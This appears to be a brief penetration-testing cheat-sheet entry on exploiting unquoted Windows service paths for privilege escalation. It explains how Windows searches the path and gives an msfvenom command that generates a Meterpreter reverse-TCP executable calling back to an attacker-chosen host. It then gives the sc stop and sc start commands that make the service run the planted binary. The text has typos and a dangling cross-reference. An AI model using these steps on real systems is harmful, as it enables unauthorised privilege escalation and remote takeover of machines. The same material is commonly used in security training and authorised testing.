Unquoted Service path

Check for Any servicewith unquoted path like C:\Program Files\My Program\My Service\svice.exe . f the service path is stored unquoted, whenever Windows starts the service it will attempt to run an executable from the following paths

C:\Program.exe
C:\Program Files\My.exe
C:\Program Files\My Program\My.exe
C:\Program Files\My Program\My service\svice.exe

We can put My.exe in My Program, if we have write permission . Can put adduser exe like in

Binary hijacking / Insecure File permissions

Or can create reverse shell,

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe > My.exe

Stop the service

sc stop svice.exe

Transfer My.exe in My Program

Start service

sc start svice.exe

Now exploit is successful